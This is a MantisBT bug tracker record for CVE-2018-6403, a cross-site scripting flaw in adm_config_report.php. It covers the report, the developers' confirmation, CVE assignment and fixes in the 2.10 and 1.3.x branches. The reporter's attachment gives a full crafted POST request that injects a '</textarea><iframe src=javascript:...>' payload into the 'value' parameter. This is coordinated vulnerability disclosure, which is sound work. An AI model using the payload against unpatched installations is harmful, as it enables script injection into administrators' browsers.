View Issue Details

IDProjectCategoryView StatusLast Update
0023906mantisbtsecuritypublic2018-02-06 21:17
ReportertuanklnewAssigned Todregad 
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
Product Version1.3.0 
Target Version2.10.1Fixed in Version2.10.1 
Summary0023906: CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
Description

Elements of POST array "value" (I tested on fixed_in_version, project_id, id) on adm_config_report.php are added scripts (in my case is </textarea><iframe src=javascript:alert(1212) ). That script is in respond HTML and executed by web browser.

This vulnerability affects Mantis 2.8 and 2.10 (I have not tested on 2.9 due to lack of time)

Steps To Reproduce

Parameters are needed to filter properly before they are accepted and respond to client.

TagsNo tags attached.

Relationships

has duplicate 0023918 closeddregad CVE-2018-6403: XSS in adm_config_report.php 'value' parameter 

Activities

tuanklnew

tuanklnew

2018-01-29 03:36

reporter  

script_executed.PNG (3,145 bytes)
script_executed.PNG (3,145 bytes)
modified_POST.txt (892 bytes)
POST /mantisbt/adm_config_report.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.70.11/mantisbt/adm_config_report.php
Cookie: MANTIS_secure_session=1;
MANTIS_STRING_COOKIE=6xgdamq8V5fgA4vDchh450KI4bKW2kxYeNRdhYfw4cvWrMPmBa7KMqx2HDi7QbsW;
PHPSESSID=ll27va6a7c2r3rv8m75phoraa7
Host: 192.168.70.11
Content-Length: 353
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
user_id=0&project_id=0&config_option=csv_columns&type=3&value=["id","project_id","reporter_id","handler_id","priority","severity","reproducibility","version","category_id","date_submitted","os","os_build","platform","view_state","last_updated","summary","status","resolution","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]&action=edit
modified_POST.txt (892 bytes)
respond.html (19,430 bytes)
dregad

dregad

2018-01-29 09:30

developer   ~0058660

Thank you for the bug report, we'll look into it.

Did you request a CVE ID for this vulnerability, or should we do it ? How would you like to be credited for the finding ?

tuanklnew

tuanklnew

2018-01-29 10:00

reporter   ~0058661

May I have CVE ID for this vulnerability? There are still other vulnerabilities. I am working to find out how serious they are. I will report issue when I got result.

vboctor

vboctor

2018-01-29 23:10

manager   ~0058666

It is worth noting that setting configuration is allowed to administrator as per recommendation and default config:

$g_set_configuration_threshold = ADMINISTRATOR;
tuanklnew

tuanklnew

2018-01-30 02:50

reporter   ~0058671

But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

dregad

dregad

2018-01-30 03:20

developer   ~0058672

But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

We'll fix it, don't worry.

May I have CVE ID for this vulnerability

I'll post it here when MITRE assigns it.

You have not answered my question:

How would you like to be credited for the finding ?

dregad

dregad

2018-01-30 05:50

developer   ~0058674

Last edited: 2018-01-30 06:22

View 2 revisions

I confirm the vulnerability, reproducible on my local dev box, in 1.3.x branch also (tested from 1.3.0 onwards).

I'd also like to point out that the risk is mitigated (with default settings and modern browsers), the XSS is not exploitable due to our CSP headers.

dregad

dregad

2018-01-30 06:58

developer   ~0058678

CVE request 456011 sent

vboctor

vboctor

2018-01-30 12:12

manager   ~0058682

I wasn't indicating that we shouldn't fix it, but we should make it clear in the CVE that administrators by default can attack themselves.

dregad

dregad

2018-01-31 03:33

developer   ~0058692

CVE-2018-6403 assigned.

dregad

dregad

2018-01-31 07:01

developer   ~0058697

@tuanklnew I pushed a commit that fixes the vulnerability as far as I can tell; please confirm that it's OK from your end as well.

tuanklnew

tuanklnew

2018-02-04 20:30

reporter   ~0058742

@dregad let me check.

tuanklnew

tuanklnew

2018-02-04 21:41

reporter   ~0058743

I 've checked. It's fixed.

dregad

dregad

2018-02-05 01:49

developer   ~0058744

Thanks for the feedback!

Related Changesets

MantisBT: master-2.10 c4afcb11

2018-01-30 06:58:29

dregad

Details Diff
Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906
Affected Issues
0023906
mod - adm_config_report.php Diff File

MantisBT: master-1.3.x 9e4db60a

2018-01-30 06:58:29

dregad

Details Diff
Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906, 0023918

Cherry-picked from c4afcb118472fef8d3a7f468b16d874f9d6cf871.
Affected Issues
0023906, 0023918
mod - adm_config_report.php Diff File

Issue History

Date Modified Username Field Change
2018-01-29 03:36 tuanklnew New Issue
2018-01-29 03:36 tuanklnew File Added: script_executed.PNG
2018-01-29 03:36 tuanklnew File Added: modified_POST.txt
2018-01-29 03:36 tuanklnew File Added: respond.html
2018-01-29 09:30 dregad Note Added: 0058660
2018-01-29 09:32 dregad Status new => acknowledged
2018-01-29 10:00 tuanklnew Note Added: 0058661
2018-01-29 23:10 vboctor Note Added: 0058666
2018-01-29 23:12 vboctor Target Version => 2.10.1
2018-01-30 02:50 tuanklnew Note Added: 0058671
2018-01-30 03:20 dregad Note Added: 0058672
2018-01-30 05:50 dregad Status acknowledged => confirmed
2018-01-30 05:50 dregad Note Added: 0058674
2018-01-30 06:22 dregad Note Edited: 0058674 View Revisions
2018-01-30 06:22 dregad Product Version 2.10.0 => 1.3.0
2018-01-30 06:58 dregad Note Added: 0058678
2018-01-30 12:12 vboctor Note Added: 0058682
2018-01-31 03:33 dregad Assigned To => dregad
2018-01-31 03:33 dregad Status confirmed => assigned
2018-01-31 03:33 dregad Summary POST array "value" of adm_config_report.php is affected by Cross-site scripting vulnerability => CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
2018-01-31 03:33 dregad Note Added: 0058692
2018-01-31 06:53 dregad Issue cloned: 0023918
2018-01-31 06:53 dregad Relationship added has duplicate 0023918
2018-01-31 06:54 dregad Changeset attached => MantisBT master-2.10 c4afcb11
2018-01-31 06:54 dregad Status assigned => resolved
2018-01-31 06:54 dregad Resolution open => fixed
2018-01-31 06:54 dregad Changeset attached => MantisBT master-1.3.x 9e4db60a
2018-01-31 06:54 dregad Fixed in Version => 1.3.14
2018-01-31 06:57 dregad Fixed in Version 1.3.14 => 2.10.1
2018-01-31 06:57 dregad View Status private => public
2018-01-31 07:01 dregad Note Added: 0058697
2018-02-04 20:30 tuanklnew Note Added: 0058742
2018-02-04 21:41 tuanklnew Note Added: 0058743
2018-02-05 01:49 dregad Note Added: 0058744
2018-02-06 21:17 vboctor Status resolved => closed